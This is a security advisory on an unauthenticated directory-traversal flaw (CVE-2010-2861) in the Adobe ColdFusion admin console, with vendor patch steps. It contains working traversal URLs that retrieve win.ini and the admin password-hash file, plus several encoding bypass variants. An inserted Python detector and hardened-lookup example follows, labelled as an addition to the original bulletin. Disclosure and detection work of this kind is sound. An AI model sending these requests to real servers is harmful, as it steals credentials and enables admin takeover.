PR10-07 - Unauthenticated File Retrieval (traversal) within ColdFusion administration console
Vulnerability found: 17 April 2010
Vendor informed: 19 April 2010
Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com). Many thanks to Adrian Pastor, and to Raf Los of HP, for increasing community awareness of this flaw.
Description: Adobe ColdFusion is an easy-to-use and very widely adopted programming language. ProCheckUp has discovered that the ColdFusion admin console (and various programs within it) is vulnerable to multiple directory traversal attacks related to an input parameter. No authentication is needed; all that is required is that the admin console is reachable from the Internet.
Notes: Tested on ColdFusion Enterprise versions 6 to 8.01 running on Windows XP and Windows 2003 R2 SP2 server, mapped to IIS 6.
Defaults were chosen, with a "server contained installation" ("like the earlier versions") and all subcomponents.
ColdFusion 9 provides an additional layer of filtering to prevent common attacks, which stops the attack below from working. ProCheckUp nevertheless recommends that ColdFusion 9 users apply the ColdFusion 9 patches, as ProCheckUp has found that the filtering can be bypassed.
Versions tested and found vulnerable:
ColdFusion MX6 6.1 base patches
ColdFusion MX7 7,0,0,91690 base patches
ColdFusion MX8 8,0,1,195765 base patches
ColdFusion MX8 8,0,1,195765 with Hotfix4
Not vulnerable:
ColdFusion 5 base patches
Consequences: Arbitrary files can be retrieved from the target server and used to gain admin rights; no authentication is required to exploit this vulnerability.
Proof of concept:
1) Multiple administration programs are vulnerable to directory traversal (for brevity only a few programs are shown), because the submitted value of the locale parameter is not sufficiently filtered. This is a generic Windows attack.
In the following examples the .cfm extension is mapped to a front-end web server (Apache, IIS, etc.):
http://target-domain.foo/CFIDE/administrator/settings/mappings.cfm?locale=..\..\..\..\..\..\..\..\windows\win.ini%00en
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\windows\win.ini%00en
In the following examples the administrator is accessed directly over port 8500:
http://target-domain.foo:8500/CFIDE/administrator/datasources/index.cfm?locale=..\..\..\..\..\..\..\..\windows\win.ini%00en
http://target-domain.foo:8500/CFIDE/administrator/j2eepackaging/editarchive.cfm?locale=..\..\..\..\..\..\..\..\..\windows\win.ini%00en
2) Single-server configuration: ColdFusion administrator password retrieval.
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en
ColdFusion 7 admin password hash retrieval - easily decoded using a SHA1 rainbow table
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en
ColdFusion 8 admin password hash retrieval - easily decoded using a SHA1 rainbow table
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en
3) Universal multiserver configuration (ColdFusion + JRun): ColdFusion administrator password file retrieval.
ColdFusion versions 6, 7 and 8 admin password hash retrieval. Versions 7 and 8 are easily decoded using a SHA1 rainbow table.
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en
How to fix:
Apply the patches described below, or restrict access to /CFIDE/administrator/ by IP address or similar controls. ProCheckUp STRONGLY recommends that access to the entire /CFIDE/ directory is restricted or, at the bare minimum, to /CFIDE/adminapi/, /CFIDE/administrator/, /CFIDE/componentutils/, /CFIDE/wizards/, /CFIDE/install.cfm and /CFIDE/probe.cfm, because of the large number of programs which use the l10n program.
ProCheckUp also recommends reading the following lockdown guide: http://www.adobe.com/products/coldfusion/whitepapers/pdf/91025512_cf9_lockdownguide_wp_ue.pdf
See http://www.adobe.com/support/security/bulletins/apsb10-18.html
ColdFusion 9
1. Download CFIDE-9.zip from Adobe.
2. Make a backup of the {CFIDE-Home}\administrator\cftags\l10n.cfm and {CFIDE-Home}\administrator\cftags\l10n_testing.cfm files.
3. Extract the files in CFIDE-9.zip to the web root directory that contains the CFIDE folder. The Server Settings > Mappings page in the ColdFusion Administrator shows the location of the CFIDE directory in the value for the CFIDE mapping.
4. Repeat steps 2 and 3 if there are other CFIDE directories identified in any other instances.
5. Restart all the ColdFusion instances.
ColdFusion 8.0.1
1. Download CFIDE-801.zip from Adobe.
2. Make a backup of the {CFIDE-Home}\administrator\cftags\l10n.cfm and {CFIDE-Home}\administrator\cftags\l10n_testing.cfm files.
3. Extract the files in CFIDE-801.zip to the web root directory that contains the CFIDE folder. The Server Settings > Mappings page in the ColdFusion Administrator shows the location of the CFIDE directory in the value for the CFIDE mapping.
4. Repeat steps 2 and 3 if there are other CFIDE directories identified in any other instances.
5. Restart all the ColdFusion instances.
ColdFusion 8.0
1. Download CFIDE-8.zip from Adobe.
2. Make a backup of the {CFIDE-Home}\administrator\cftags\l10n.cfm and {CFIDE-Home}\administrator\cftags\l10n_testing.cfm files.
3. Extract the files in CFIDE-8.zip to the web root directory that contains the CFIDE folder. The Server Settings > Mappings page in the ColdFusion Administrator shows the location of the CFIDE directory in the value for the CFIDE mapping.
4. Repeat steps 2 and 3 if there are other CFIDE directories identified in any other instances.
5. Restart all the ColdFusion instances.
Note: the following working ColdFusion 8 exploit variations were used to validate the patch:
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../..\ColdFusion8\lib\password.properties%00en
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..\ColdFusion8\lib\password.properties%00en
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f..\ColdFusion8\lib\password.properties%00en
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..\/..\/..\/..\/..\/..\/..\/..\ColdFusion8\lib\password.properties%00en
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=..//..//..//..//..//..//..//..\ColdFusion8\lib\password.properties%00en
http://target-domain.foo/CFIDE/administrator/logging/settings.cfm?locale=.././.././.././.././.././.././.././..\ColdFusion8\lib\password.properties%00en
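The variations above show why a filter that only looks for a literal "..\" is not enough: the same traversal arrives as "%2f", "%2e%2e", "..\/", "..//" or ".././", followed by "%00" to truncate the filename. The Python below is an added example, not code from this advisory, from ProCheckUp or from Adobe's patch; it canonicalises a locale value before inspecting it (so any mix of those encodings is caught, not just the six listed), runs that check over constructed web-server log lines to flag attempts retrospectively, and shows the allowlist-plus-canonical-path lookup that a fix of the l10n code itself needs alongside the IP restriction recommended under "How to fix". The log lines, the locale allowlist syntax and the "<locale>.xml" file naming are assumptions for illustration; ColdFusion's real l10n.cfm logic is not reproduced.

```python
"""Detection and hardening for the locale-parameter traversal described in this
advisory.  Added example (not ProCheckUp's or Adobe's code); the log lines and
the locale-file naming scheme are constructed for illustration."""
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines in a simplified combined format.  Real web
# servers may escape backslashes in the request field; adjust REQUEST_RE if so.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [17/Apr/2010:10:00:01 +0100] "GET /CFIDE/administrator/logging/settings.cfm?locale=en HTTP/1.1" 200 4211',
    '203.0.113.5 - - [17/Apr/2010:10:00:02 +0100] "GET /CFIDE/administrator/logging/settings.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini%00en HTTP/1.1" 200 9012',
    '203.0.113.5 - - [17/Apr/2010:10:00:03 +0100] "GET /CFIDE/administrator/logging/settings.cfm?locale=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..\\ColdFusion8\\lib\\password.properties%00en HTTP/1.1" 200 512',
    '203.0.113.5 - - [17/Apr/2010:10:00:04 +0100] "GET /CFIDE/administrator/logging/settings.cfm?locale=%2e%2e%2f%2e%2e%2f..\\ColdFusion8\\lib\\password.properties%00en HTTP/1.1" 200 512',
    '203.0.113.5 - - [17/Apr/2010:10:00:05 +0100] "GET /CFIDE/administrator/logging/settings.cfm?locale=.././.././..\\ColdFusion8\\lib\\password.properties%00en HTTP/1.1" 200 512',
    '203.0.113.5 - - [17/Apr/2010:10:00:06 +0100] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')
# Allowlist for what a locale should look like, e.g. "en" or "en_US" (assumed
# syntax; ColdFusion's own accepted values are not reproduced here).
LOCALE_RE = re.compile(r"[a-z]{2,3}(?:_[A-Z]{2})?")


def normalize(value: str) -> str:
    """Canonicalise a parameter value the way a filter must before inspecting
    it: percent-decode until stable (bounded, to defeat double encoding), map
    backslashes to slashes and collapse runs of slashes.  This is what turns
    the '..%2f', '..\\/', '..//' and '.././' variants into plain '../'."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\\", "/")
    return re.sub(r"/+", "/", value)


def is_traversal(locale_value: str) -> bool:
    """True if the value contains a '..' path segment or a NUL byte (the
    '%00en' suffix used to truncate the filename after the real target)."""
    norm = normalize(locale_value)
    return "\x00" in norm or ".." in norm.split("/")


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, normalised locale) for every request whose locale
    parameter looks like a traversal attempt."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for raw in parse_qs(query, keep_blank_values=True).get("locale", []):
            if is_traversal(raw):
                hits.append((lineno, normalize(raw)))
    return hits


def resolve_locale_file(base_dir: str, locale: str) -> Optional[str]:
    """Hardened lookup of a locale file under base_dir.  Two independent
    checks: the value must match the allowlist, and the canonical path must
    still lie inside base_dir.  Returns None when either check fails."""
    if "\x00" in locale or not LOCALE_RE.fullmatch(locale):
        return None
    base = os.path.realpath(base_dir)
    # "<locale>.xml" is an assumed naming scheme for illustration only.
    candidate = os.path.realpath(os.path.join(base, locale + ".xml"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    for lineno, value in scan_log(SAMPLE_LOG_LINES):
        print(f"line {lineno}: suspicious locale {value!r}")
    print(resolve_locale_file(".", "en"))
    print(resolve_locale_file(".", "..\\..\\windows\\win.ini\x00en"))
```

Run against the sample lines, scan_log flags lines 2 to 5 and leaves the two legitimate requests alone. The resolver deliberately keeps both checks even though the allowlist alone rejects every variant on this page: the realpath containment test is what still holds if the allowlist is later loosened to accept values that can contain path characters.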
References:
CVE-2010-2861
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2861
APSB10-18
http://www.adobe.com/support/security/bulletins/apsb10-18.html
Legal:
Copyright 2010 Procheckup Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.